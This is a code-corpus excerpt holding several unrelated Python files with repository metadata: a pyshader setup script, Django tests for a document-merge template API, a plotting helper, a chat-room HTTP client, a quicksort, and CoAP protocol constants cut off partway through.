] | 48 | 2020-07-19T15:55:08.000Z | 2022-03-21T15:02:45.000Z | setup.py | almarklein/python-shader | 804f2a63221b40434ebcbeb4a01eeebe0d361a90 | [
"BSD-2-Clause"
] | 22 | 2019-12-31T16:01:28.000Z | 2020-06-15T20:03:58.000Z | setup.py | almarklein/spirv-py | 804f2a63221b40434ebcbeb4a01eeebe0d361a90 | [
"BSD-2-Clause"
] | 2 | 2020-10-12T09:42:28.000Z | 2021-03-04T08:20:19.000Z | from setuptools import find_packages, setup
def get_version_and_docstring():
ns = {"__doc__": "", "__version__": ""}
docStatus = 0 # Not started, in progress, done
for line in open("pyshader/__init__.py").readlines():
if line.startswith("__version__"):
exec(line.strip(), ns, ns)
elif line.startswith('"""'):
if docStatus == 0:
docStatus = 1
line = line.lstrip('"')
elif docStatus == 1:
docStatus = 2
if docStatus == 1:
ns["__doc__"] += line.rstrip() + "\n"
return ns["__version__"], ns["__doc__"]
version, doc = get_version_and_docstring()
setup(
name="pyshader",
version=version,
url="https://github.com/pygfx/pyshader",
description="Write modern GPU shaders in Python!",
long_description=doc,
long_description_content_type="text/markdown",
author="Almar Klein",
author_email="almar.klein@gmail.com",
packages=find_packages(
exclude=["tests", "tests.*", "examples_py", "examples_py.*"]
),
python_requires=">=3.6.0",
zip_safe=True,
classifiers=[
"Development Status :: 3 - Alpha",
"Intended Audience :: Developers",
"License :: OSI Approved :: BSD License",
"Programming Language :: Python :: 3",
"Topic :: Software Development :: Libraries :: Python Modules",
"Topic :: Scientific/Engineering :: Visualization",
],
)
| 32.021739 | 71 | 0.592668 | 154 | 1,473 | 5.376623 | 0.577922 | 0.018116 | 0.031401 | 0.05314 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010092 | 0.260014 | 1,473 | 45 | 72 | 32.733333 | 0.749541 | 0.020367 | 0 | 0 | 0 | 0 | 0.33796 | 0.02984 | 0 | 0 | 0 | 0 | 0 | 1 | 0.025 | false | 0 | 0.025 | 0 | 0.075 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d11455c8d4927ecd28e1f0ac9c54300b6beed02f | 23,636 | py | Python | document_merge_service/api/tests/test_template.py | ganwell/document-merge-service | 94b7cd2e46a244047efe7a45a16d997431b2c12f | [
"MIT"
] | null | null | null | document_merge_service/api/tests/test_template.py | ganwell/document-merge-service | 94b7cd2e46a244047efe7a45a16d997431b2c12f | [
"MIT"
] | null | null | null | document_merge_service/api/tests/test_template.py | ganwell/document-merge-service | 94b7cd2e46a244047efe7a45a16d997431b2c12f | [
"MIT"
] | null | null | null | import io
import json
import pytest
from django.urls import reverse
from docx import Document
from lxml import etree
from rest_framework import status
from document_merge_service.api.data import django_file
from .. import models, serializers
@pytest.mark.parametrize(
"template__group,group_access_only,size",
[(None, False, 2), ("admin", True, 2), ("unknown", True, 1), ("unknown", False, 2)],
)
def test_template_list_group_access(
db,
admin_client,
template,
template_factory,
snapshot,
size,
group_access_only,
settings,
):
settings.GROUP_ACCESS_ONLY = group_access_only
url = reverse("template-list")
# add a global template (no group)
template_factory()
response = admin_client.get(url)
assert response.status_code == status.HTTP_200_OK
assert response.json()["count"] == size
@pytest.mark.parametrize("template__description", ["test description"])
@pytest.mark.parametrize(
"query_params,size",
[
({"description__icontains": "test"}, 1),
({"description__search": "test"}, 1),
({"description__icontains": "unknown"}, 0),
({"description__search": "unknown"}, 0),
],
)
def test_template_list_query_params(
db, admin_client, template, snapshot, size, query_params
):
url = reverse("template-list")
response = admin_client.get(url, data=query_params)
assert response.status_code == status.HTTP_200_OK
assert response.json()["count"] == size
def test_template_detail(db, client, template):
url = reverse("template-detail", args=[template.pk])
response = client.get(url)
assert response.status_code == status.HTTP_200_OK
@pytest.mark.parametrize(
"template_name,engine,status_code,group,require_authentication,authenticated",
[
(
"docx-template.docx",
models.Template.DOCX_TEMPLATE,
status.HTTP_201_CREATED,
None,
False,
False,
),
(
"docx-template.docx",
models.Template.DOCX_TEMPLATE,
status.HTTP_201_CREATED,
None,
True,
True,
),
(
"docx-template.docx",
models.Template.DOCX_TEMPLATE,
status.HTTP_401_UNAUTHORIZED,
None,
True,
False,
),
(
"docx-template.docx",
models.Template.DOCX_TEMPLATE,
status.HTTP_400_BAD_REQUEST,
"unknown",
True,
True,
),
(
"docx-template.docx",
models.Template.DOCX_TEMPLATE,
status.HTTP_201_CREATED,
"admin",
True,
True,
),
(
"docx-mailmerge.docx",
models.Template.DOCX_MAILMERGE,
status.HTTP_201_CREATED,
"admin",
True,
True,
),
(
"docx-mailmerge-syntax.docx",
models.Template.DOCX_MAILMERGE,
status.HTTP_400_BAD_REQUEST,
"admin",
True,
True,
),
(
"docx-template-syntax.docx",
models.Template.DOCX_TEMPLATE,
status.HTTP_400_BAD_REQUEST,
"admin",
True,
True,
),
(
"test.txt",
models.Template.DOCX_TEMPLATE,
status.HTTP_400_BAD_REQUEST,
None,
False,
False,
),
],
)
def test_template_create(
db,
client,
admin_client,
engine,
template_name,
status_code,
group,
require_authentication,
settings,
authenticated,
):
if authenticated:
client = admin_client
settings.REQUIRE_AUTHENTICATION = require_authentication
url = reverse("template-list")
template_file = django_file(template_name)
data = {"slug": "test-slug", "template": template_file.file, "engine": engine}
if group:
data["group"] = group
response = client.post(url, data=data, format="multipart")
assert response.status_code == status_code
if status_code == status.HTTP_201_CREATED:
data = response.json()
template_link = data["template"]
response = client.get(template_link)
assert response.status_code == status.HTTP_200_OK
Document(io.BytesIO(response.content))
@pytest.mark.parametrize(
"status_code, disable_validation",
[
(
status.HTTP_400_BAD_REQUEST,
"false",
),
(
status.HTTP_400_BAD_REQUEST,
"",
),
(
status.HTTP_201_CREATED,
"true",
),
],
)
def test_disable_validation(
db,
status_code,
admin_client,
settings,
disable_validation,
):
settings.REQUIRE_AUTHENTICATION = False
url = reverse("template-list")
template_file = django_file("docx-template-syntax.docx")
data = {
"slug": "test-slug",
"template": template_file.file,
"engine": models.Template.DOCX_TEMPLATE,
}
if disable_validation:
data["disable_template_validation"] = disable_validation
response = admin_client.post(url, data=data, format="multipart")
assert response.status_code == status_code
if status_code == status.HTTP_201_CREATED:
data = response.json()
template_link = data["template"]
response = admin_client.get(template_link)
assert response.status_code == status.HTTP_200_OK
Document(io.BytesIO(response.content))
@pytest.mark.parametrize(
"template_name,available_placeholders,sample_data,files,expect_missing_placeholders,engine,status_code",
[
(
"docx-template-placeholdercheck.docx",
["foo", "bar", "baz"],
None,
[],
[
"bar.some_attr",
"black.png",
"list",
"list[]",
"list[].attribute",
],
models.Template.DOCX_TEMPLATE,
status.HTTP_400_BAD_REQUEST,
),
(
"docx-template-placeholdercheck.docx",
[
"foo",
"bar",
"baz",
"bar.some_attr",
"list[].attribute",
"black.png",
],
None,
[],
[],
models.Template.DOCX_TEMPLATE,
status.HTTP_201_CREATED,
),
(
"docx-template-placeholdercheck.docx",
[
"foo",
"bar",
"baz",
"bar.some_attr",
"list[].attribute",
],
None,
[],
["black.png"],
models.Template.DOCX_TEMPLATE,
status.HTTP_400_BAD_REQUEST,
),
(
"docx-template-placeholdercheck.docx",
None,
{
"foo": "hello",
"bar": {
"some_attr": True,
"list": [{"attribute": "value"}, {"attribute": "value2"}],
},
"baz": "1234",
"list": [{"attribute": "value"}],
},
[django_file("black.png").file],
[],
models.Template.DOCX_TEMPLATE,
status.HTTP_201_CREATED,
),
(
"docx-template-placeholdercheck.docx",
None,
{},
[django_file("black.png").file],
[],
models.Template.DOCX_TEMPLATE,
status.HTTP_400_BAD_REQUEST,
),
(
"docx-template-placeholdercheck.docx",
None,
{},
[],
[],
models.Template.DOCX_TEMPLATE,
status.HTTP_201_CREATED,
),
(
"docx-template-placeholdercheck.docx",
None,
{
"foo": "hello",
"bar": {
"some_attr": True,
"list": [{"attribute": "value"}, {"attribute": "value2"}],
},
"baz": "1234",
"list": [{"attribute": "value"}],
},
[],
["black.png"],
models.Template.DOCX_TEMPLATE,
status.HTTP_400_BAD_REQUEST,
),
(
"docx-template-placeholdercheck.docx",
None,
{
"foo": "hello",
"bar": {
"some_attr": True,
"list": [{"attribute": "value"}, {"attribute": "value2"}],
},
},
[django_file("black.png").file],
["baz", "list", "list[]", "list[].attribute"],
models.Template.DOCX_TEMPLATE,
status.HTTP_400_BAD_REQUEST,
),
(
"docx-mailmerge.docx",
None,
{
"foo": "hello",
"bar": {
"some_attr": True,
"list": [{"attribute": "value"}, {"attribute": "value2"}],
},
},
[],
["test"],
models.Template.DOCX_MAILMERGE,
status.HTTP_400_BAD_REQUEST,
),
(
"docx-mailmerge.docx",
None,
{
"foo": "hello",
"bar": {
"some_attr": True,
"list": [{"attribute": "value"}, {"attribute": "value2"}],
},
},
[],
["test"],
models.Template.DOCX_MAILMERGE,
status.HTTP_400_BAD_REQUEST,
),
(
"docx-mailmerge.docx",
None,
{"test": "hello"},
[],
[],
models.Template.DOCX_MAILMERGE,
status.HTTP_201_CREATED,
),
(
"docx-mailmerge.docx",
["test", "blah"],
{"test": "hello"},
[],
[],
models.Template.DOCX_MAILMERGE,
status.HTTP_400_BAD_REQUEST,
),
(
"docx-mailmerge.docx",
[],
{"test": "hello"},
[django_file("black.png").file],
[],
models.Template.DOCX_MAILMERGE,
status.HTTP_400_BAD_REQUEST,
),
],
)
def test_template_create_with_available_placeholders(
db,
admin_client,
engine,
template_name,
available_placeholders,
sample_data,
files,
status_code,
settings,
expect_missing_placeholders,
):
settings.DOCXTEMPLATE_JINJA_EXTENSIONS = ["jinja2.ext.loopcontrols"]
url = reverse("template-list")
template_file = django_file(template_name)
data = {
"slug": "test-slug",
"template": template_file.file,
"files": files,
"engine": engine,
}
if sample_data:
data["sample_data"] = json.dumps(sample_data)
if available_placeholders:
data["available_placeholders"] = available_placeholders
response = admin_client.post(url, data=data, format="multipart")
assert response.status_code == status_code, response.json()
if status_code == status.HTTP_400_BAD_REQUEST:
resp = response.json()
expect_missing_str = "; ".join(expect_missing_placeholders)
if sample_data and available_placeholders:
# validation only allows one of these two params
assert (
resp["non_field_errors"][0]
== "Only one of available_placeholders and sample_data is allowed"
)
elif engine == models.Template.DOCX_MAILMERGE and files:
assert (
resp["non_field_errors"][0]
== 'Files are only accepted with the "docx-template" engine'
)
elif not sample_data and files:
assert (
resp["non_field_errors"][0]
== "Files are only accepted when also providing sample_data"
)
else:
# we expect some missing placeholders
assert (
resp["non_field_errors"][0]
== f"Template uses unavailable placeholders: {expect_missing_str}"
)
if status_code == status.HTTP_201_CREATED:
data = response.json()
template_link = data["template"]
response = admin_client.get(template_link)
assert response.status_code == status.HTTP_200_OK
Document(io.BytesIO(response.content))
@pytest.mark.parametrize(
"template_name,status_code",
[
("docx-template.docx", status.HTTP_200_OK),
("test.txt", status.HTTP_400_BAD_REQUEST),
],
)
def test_template_update(db, client, template, template_name, status_code):
url = reverse("template-detail", args=[template.pk])
template_file = django_file(template_name)
data = {"description": "Test description", "template": template_file.file}
response = client.patch(url, data=data, format="multipart")
assert response.status_code == status_code
if status_code == status.HTTP_200_OK:
template.refresh_from_db()
assert template.description == "Test description"
def test_template_destroy(db, client, template):
url = reverse("template-detail", args=[template.pk])
response = client.delete(url)
assert response.status_code == status.HTTP_204_NO_CONTENT
@pytest.mark.parametrize(
"template__slug,template__engine,template__template",
[
(
"TestNameTemplate",
models.Template.DOCX_TEMPLATE,
django_file("docx-template.docx"),
),
(
"TestNameMailMerge",
models.Template.DOCX_MAILMERGE,
django_file("docx-mailmerge.docx"),
),
],
)
def test_template_merge_docx(db, client, template, snapshot):
url = reverse("template-merge", args=[template.pk])
response = client.post(url, data={"data": {"test": "Test input"}}, format="json")
assert response.status_code == status.HTTP_200_OK
assert (
response._headers["content-type"][1]
== "application/vnd.openxmlformats-officedocument.wordprocessingml.document"
)
docx = Document(io.BytesIO(response.content))
xml = etree.tostring(docx._element.body, encoding="unicode", pretty_print=True)
try:
snapshot.assert_match(xml)
except AssertionError: # pragma: no cover
with open(f"/tmp/{template.slug}.docx", "wb") as output:
output.write(response.content)
print("Template output changed. Check file at %s" % output.name)
raise
@pytest.mark.parametrize(
"placeholder,template_content",
[
("{{blah}}", {"blah": "blub"}),
(
'{{NAME and ", represents " + NAME}}',
{"NAME": "foo"},
),
(
'{{NAME and ", represents " + NAME}}',
{"NAME": ""},
),
],
)
def test_merge_expression(
docx_template_with_placeholder, client, snapshot, placeholder, template_content
):
"""Test evaluation of some custom expressions.
Use this test to try out expressions without creating a new docx template for each
variant.
"""
template = docx_template_with_placeholder(placeholder)
url = reverse("template-merge", args=[template.pk])
response = client.post(url, data={"data": template_content}, format="json")
assert response.status_code == status.HTTP_200_OK
docx = Document(io.BytesIO(response.content))
xml = etree.tostring(docx._element.body, encoding="unicode", pretty_print=True)
try:
snapshot.assert_match(xml)
except AssertionError: # pragma: no cover
with open(f"/tmp/{template.slug}.docx", "wb") as output:
output.write(response.content)
print("Template output changed. Check file at %s" % output.name)
raise
@pytest.mark.parametrize(
"placeholder,template_content",
[
("{{blah}}", {"blah": "blub"}),
(
'{{NAME and ", represents " + NAME}}',
{"NAME": "foo"},
),
(
'{{NAME and ", represents " + NAME}}',
{"NAME": ""},
),
],
)
def test_validate_expression(
docx_template_with_placeholder, client, placeholder, template_content
):
"""Test validation of templates with custom expressions."""
template = docx_template_with_placeholder(placeholder)
serializer = serializers.TemplateSerializer()
serializer.instance = template
serializer.validate({"data": template_content})
# This needs a strange parametrization. If `unoconv_local` is in a separate
# `parametrize()`, the template filename in the second test will be appended with a
# hash and the test fails
@pytest.mark.parametrize(
"template__engine,template__template,unoconv_local",
[
(models.Template.DOCX_TEMPLATE, django_file("docx-template.docx"), True),
(models.Template.DOCX_TEMPLATE, django_file("docx-template.docx"), False),
],
)
def test_template_merge_as_pdf(db, settings, unoconv_local, client, template):
url = reverse("template-merge", args=[template.pk])
response = client.post(
url, data={"data": {"test": "Test input"}, "convert": "pdf"}, format="json"
)
assert response.status_code == status.HTTP_200_OK
assert response["Content-Type"] == "application/pdf"
assert f"{template.pk}.pdf" in response["Content-Disposition"]
assert response.content[0:4] == b"%PDF"
@pytest.mark.parametrize(
"template__engine,template__template",
[(models.Template.DOCX_TEMPLATE, django_file("docx-template-loopcontrols.docx"))],
)
def test_template_merge_jinja_extensions_docx(db, client, template, settings, snapshot):
settings.DOCXTEMPLATE_JINJA_EXTENSIONS = ["jinja2.ext.loopcontrols"]
url = reverse("template-merge", args=[template.pk])
response = client.post(url, data={"data": {"test": "Test input"}}, format="json")
assert response.status_code == status.HTTP_200_OK
assert (
response._headers["content-type"][1]
== "application/vnd.openxmlformats-officedocument.wordprocessingml.document"
)
docx = Document(io.BytesIO(response.content))
xml = etree.tostring(docx._element.body, encoding="unicode", pretty_print=True)
snapshot.assert_match(xml)
@pytest.mark.parametrize(
"missing_file,wrong_mime,status_code",
[
(False, False, status.HTTP_200_OK),
(False, True, status.HTTP_400_BAD_REQUEST),
(True, False, status.HTTP_400_BAD_REQUEST),
],
)
@pytest.mark.parametrize(
"template__engine",
[models.Template.DOCX_TEMPLATE],
)
def test_template_merge_jinja_filters_docx(
db,
client,
template,
snapshot,
settings,
tmp_path,
missing_file,
wrong_mime,
status_code,
):
settings.LANGUAGE_CODE = "de-ch"
url = reverse("template-merge", args=[template.pk])
# Couldn't put this into `parametrize`. For some reason, in the second run, the
# template name is extended with a seemingly random string.
template.template = django_file("docx-template-filters.docx")
template.save()
data = {
"data": json.dumps(
{
"test_date": "1984-09-15",
"test_time": "23:24",
"test_datetime": "1984-09-15 23:23",
"test_datetime2": "23:23-1984-09-15",
"test_none": None,
"test_nested": {"multiline": "This is\na test."},
}
),
}
if not missing_file:
file = django_file("black.png").file
if wrong_mime:
# create a file with the correct filename (black.png) but with
# the contents of a docx.
file = tmp_path / "black.png"
for line in template.template.file:
file.write_bytes(line)
file = file.open("rb")
data["files"] = [file]
response = client.post(url, data=data, format="multipart")
assert response.status_code == status_code
if status_code == status.HTTP_200_OK:
assert (
response._headers["content-type"][1]
== "application/vnd.openxmlformats-officedocument.wordprocessingml.document"
)
docx = Document(io.BytesIO(response.content))
xml = etree.tostring(docx._element.body, encoding="unicode", pretty_print=True)
snapshot.assert_match(xml)
@pytest.mark.parametrize(
"template__engine",
[models.Template.DOCX_TEMPLATE],
)
@pytest.mark.parametrize(
"file_value",
[None, ""],
)
def test_template_merge_file_reset(
db,
client,
template,
settings,
file_value,
):
settings.LANGUAGE_CODE = "de-ch"
url = reverse("template-merge", args=[template.pk])
# Couldn't put this into `parametrize`. For some reason, in the second run, the
# template name is extended with a seemingly random string.
template.template = django_file("docx-template-filters.docx")
template.save()
data = {
"data": {
"test_date": "1984-09-15",
"test_time": "23:24",
"test_datetime": "1984-09-15 23:23",
"test_datetime2": "23:23-1984-09-15",
"test_none": None,
"test_nested": {"multiline": "This is\na test."},
"black.png": file_value,
}
}
response = client.post(url, data=data, format="json")
assert response.status_code == status.HTTP_200_OK
assert (
response._headers["content-type"][1]
== "application/vnd.openxmlformats-officedocument.wordprocessingml.document"
)
@pytest.mark.parametrize(
"sample,expected",
[
({"foo": {"bar": ["foo", "blah"]}}, ["foo", "foo.bar", "foo.bar[]"]),
(
{
"this": {
"is": {
"a": [
{
"list": {
"with": {
"a": ["nested", "object", "and", "a", "list"]
}
}
}
]
}
}
},
[
"this",
"this.is",
"this.is.a",
"this.is.a[]",
"this.is.a[].list",
"this.is.a[].list.with",
"this.is.a[].list.with.a",
"this.is.a[].list.with.a[]",
],
),
],
)
def test_sample_to_placeholders(sample, expected):
ts = serializers.TemplateSerializer()
assert ts._sample_to_placeholders(sample) == sorted(expected)
@pytest.mark.parametrize(
"template__engine,template__template",
[
(
models.Template.DOCX_TEMPLATE,
django_file("docx-template-placeholdercheck.docx"),
)
],
)
def test_template_merge_missing_data(db, client, template, settings):
settings.DOCXTEMPLATE_JINJA_EXTENSIONS = ["jinja2.ext.loopcontrols"]
url = reverse("template-merge", args=[template.pk])
response = client.post(url, data={"data": {"blah": "Test input"}}, format="json")
assert response.status_code == status.HTTP_400_BAD_REQUEST
assert response.json() == [
"Placeholder from template not found in data: 'bar' is undefined"
]
| 29.216316 | 108 | 0.552505 | 2,303 | 23,636 | 5.464177 | 0.118107 | 0.051494 | 0.045772 | 0.047521 | 0.695327 | 0.651621 | 0.618802 | 0.58924 | 0.570407 | 0.52829 | 0 | 0.015918 | 0.32222 | 23,636 | 808 | 109 | 29.252475 | 0.769601 | 0.037147 | 0 | 0.606488 | 0 | 0 | 0.198055 | 0.069583 | 0 | 0 | 0 | 0 | 0.056417 | 1 | 0.023977 | false | 0 | 0.012694 | 0 | 0.036671 | 0.008463 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d115700aac242d3b1b099963203e91cfd2713a5f | 953 | py | Python | timegraph/drawing/drawing.py | jfm/TimeGraph | f5da84f076fbe34f5a8d615a17b26b270b16e662 | [
"MIT"
] | null | null | null | timegraph/drawing/drawing.py | jfm/TimeGraph | f5da84f076fbe34f5a8d615a17b26b270b16e662 | [
"MIT"
] | null | null | null | timegraph/drawing/drawing.py | jfm/TimeGraph | f5da84f076fbe34f5a8d615a17b26b270b16e662 | [
"MIT"
] | null | null | null | from numbers import Number
from timegraph.drawing.plotter import Plotter
class Drawing:
def __init__(self):
self.plotter = Plotter()
def create_graph(self, title, db_response):
value_list = self.get_value_list(db_response.get_points())
self.plotter.plot_timeseries(value_list)
def get_value_list(self, points):
result = []
for point in points:
point_keys = point.keys()
for key in point_keys:
if key != 'time':
if (point[key] is not None and
isinstance(point[key], Number)):
result.append(point[key])
return result
def print_graph(self, lines):
for line in lines:
print(line)
class DrawingException(Exception):
def __init__(self, code, message):
super().__init__(code, message)
self.code = code
self.message = message
| 25.078947 | 66 | 0.58447 | 110 | 953 | 4.827273 | 0.409091 | 0.067797 | 0.041431 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.327387 | 953 | 37 | 67 | 25.756757 | 0.828393 | 0 | 0 | 0 | 0 | 0 | 0.004197 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.192308 | false | 0 | 0.076923 | 0 | 0.384615 | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d11872aebf89c5087977d0c53424643d2ec74406 | 635 | py | Python | misc/xmpp.py | ChanJLee/YLive_Server | a8cab5da54ed017aa8e86f31be1cb768e887df8e | [
"Apache-2.0"
] | null | null | null | misc/xmpp.py | ChanJLee/YLive_Server | a8cab5da54ed017aa8e86f31be1cb768e887df8e | [
"Apache-2.0"
] | null | null | null | misc/xmpp.py | ChanJLee/YLive_Server | a8cab5da54ed017aa8e86f31be1cb768e887df8e | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
import httplib
def cal_room_name(user):
return "room_%d" % user.id
def create_chat_room(user):
uri = ("/chat_room/?room_name=%s&room_title=%s" % (cal_room_name(user), user.username))
connection = httplib.HTTPConnection("localhost", 8081)
connection.request("POST", uri, None)
response = connection.getresponse()
return response.read()
def query_chat_room(user):
uri = ("/chat_room/?room_name=%s" % cal_room_name(user))
connection = httplib.HTTPConnection("localhost", 8081)
connection.request("GET", uri, None)
response = connection.getresponse()
return response.read()
| 27.608696 | 91 | 0.699213 | 82 | 635 | 5.219512 | 0.378049 | 0.093458 | 0.077103 | 0.10514 | 0.759346 | 0.686916 | 0.686916 | 0.401869 | 0.149533 | 0 | 0 | 0.016791 | 0.155906 | 635 | 22 | 92 | 28.863636 | 0.781716 | 0.018898 | 0 | 0.4 | 0 | 0 | 0.151369 | 0.099839 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.066667 | 0.066667 | 0.466667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d11a0f14b13e08c2ea2ffb4f9fe578313734bce9 | 591 | py | Python | PROB10/my_sort/quickSort.py | JoshOY/DataStructureCourseDesign | 74085237fe4ab997c5cb86c56c26f552ce9d1f01 | [
"MIT"
] | null | null | null | PROB10/my_sort/quickSort.py | JoshOY/DataStructureCourseDesign | 74085237fe4ab997c5cb86c56c26f552ce9d1f01 | [
"MIT"
] | null | null | null | PROB10/my_sort/quickSort.py | JoshOY/DataStructureCourseDesign | 74085237fe4ab997c5cb86c56c26f552ce9d1f01 | [
"MIT"
] | null | null | null | import copy
qsort_step = 0
def quick_sort(sorting_list):
global qsort_step
ls = copy.deepcopy(sorting_list)
if len(sorting_list) == 0:
return []
elif len(sorting_list) == 1:
return sorting_list
else:
pivot = ls[0]
qsort_step += 1
left = quick_sort([x for x in ls[1:] if x < pivot])
right = quick_sort([x for x in ls[1:] if x >= pivot])
return left + [pivot] + right
if __name__ == "__main__":
sList = [13, 14, 94, 33, 82, 25, 59, 94, 65, 23, 45, 27, 73, 25, 39, 10]
print([quick_sort(sList), qsort_step]) | 28.142857 | 76 | 0.580372 | 93 | 591 | 3.462366 | 0.462366 | 0.170807 | 0.086957 | 0.080745 | 0.167702 | 0.167702 | 0.167702 | 0.167702 | 0.167702 | 0.167702 | 0 | 0.092417 | 0.285956 | 591 | 21 | 77 | 28.142857 | 0.670616 | 0 | 0 | 0 | 0 | 0 | 0.013514 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0 | 0.055556 | 0 | 0.277778 | 0.055556 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d11b5dcf6ed13b57fcbad01aaad4e40798e3657d | 5,534 | py | Python | eds/openmtc-gevent/common/openmtc/lib/coap/coapy/coapy/constants.py | piyush82/elastest-device-emulator-service | b4d6b393d6042c54a7b3dfb5f58cad5efd00f0e7 | [
"Apache-2.0"
] | null | null | null | eds/openmtc-gevent/common/openmtc/lib/coap/coapy/coapy/constants.py | piyush82/elastest-device-emulator-service | b4d6b393d6042c54a7b3dfb5f58cad5efd00f0e7 | [
"Apache-2.0"
] | null | null | null | eds/openmtc-gevent/common/openmtc/lib/coap/coapy/coapy/constants.py | piyush82/elastest-device-emulator-service | b4d6b393d6042c54a7b3dfb5f58cad5efd00f0e7 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2010 People Power Co.
# All rights reserved.
#
# This open source code was developed with funding from People Power Company
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# - Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the
# distribution.
# - Neither the name of the People Power Corporation nor the names of
# its contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# PEOPLE POWER CO. OR ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
# OF THE POSSIBILITY OF SUCH DAMAGE
#
COAP_PORT = 5683 #61616
"""The (TBR) IANA-assigned standard port for COAP services."""
RESPONSE_TIMEOUT = 1
"""The time, in seconds, to wait for an acknowledgement of a
confirmable message.
The inter-transmission time doubles for each retransmission."""
MAX_RETRANSMIT = 15
"""The number of retransmissions of confirmable messages to
non-multicast endpoints before the infrastructure assumes no
acknowledgement will be received."""
"""OLD CODES
codes = { 1: 'GET',
2: 'POST',
3: 'PUT',
4: 'DELETE',
40: '100 Continue',
80: '200 OK',
81: '201 Created',
124: '304 Not Modified',
160: '400 Bad Request',
164: '404 Not Found',
165: '405 Method Not Allowed',
175: '415 Unsupported Media Type',
200: '500 Internal Server Error',
202: '502 Bad Gateway',
204: '504 Gateway Timeout' }
GET = 1
POST = 2
PUT = 3
DELETE = 4
CONTINUE = 40
OK = 80
CREATED = 81
NOT_MODIFIED = 124
BAD_REQUEST = 160
NOT_FOUND = 164
METHOD_NOT_ALLOWED = 165
UNSUPPORTED_MEDIA_TYPE = 175
INTERNAL_SERVER_ERROR = 200
BAD_GATEWAY = 202
GATEWAY_TIMEOUT = 204
"""
codes = { 1: '0.01 GET',
2: '0.02 POST',
3: '0.03 PUT',
4: '0.04 DELETE',
65: '2.01 Created',
66: '2.02 Deleted',
67: '2.03 Valid',
68: '2.04 Changed',
69: '2.05 Content',
95: '2.31 Continue',
128: '4.00 Bad Request',
131: '4.03 Forbidden',
132: '4.04 Not Found',
133: '4.05 Method Not Allowed',
143: '4.15 Unsupported Content Format',
160: '5.00 Internal Server Error',
162: '5.02 Bad Gateway',
164: '5.04 Gateway Timeout' }
GET = 1
POST = 2
PUT = 3
DELETE = 4
CREATED = 65
DELETED = 66
VALID = 67
CHANGED = 68
CONTENT = 69
CONTINUE = 95
BAD_REQUEST = 128
FORBIDDEN = 131
NOT_FOUND = 132
METHOD_NOT_ALLOWED = 133
UNSUPPORTED_CONTENT_FORMAT = 143
INTERNAL_SERVER_ERROR = 160
BAD_GATEWAY = 162
GATEWAY_TIMEOUT = 164
http2coap_codes = {200: CONTENT,
201: CREATED,
202: CREATED,
204: CHANGED,
304: VALID,
400: BAD_REQUEST,
403: FORBIDDEN,
404: NOT_FOUND,
405: METHOD_NOT_ALLOWED,
409: METHOD_NOT_ALLOWED,
415: UNSUPPORTED_CONTENT_FORMAT,
500: INTERNAL_SERVER_ERROR,
502: BAD_GATEWAY,
504: GATEWAY_TIMEOUT}
media_types = { 0: 'text/plain',
1: 'text/xml',
2: 'text/csv',
3: 'text/html',
21: 'image/gif',
22: 'image/jpeg',
23: 'image/png',
24: 'image/tiff',
25: 'audio/raw',
26: 'video/raw',
40: 'application/link-format',
41: 'application/xml',
42: 'application/octet-stream',
43: 'application/rdf+xml',
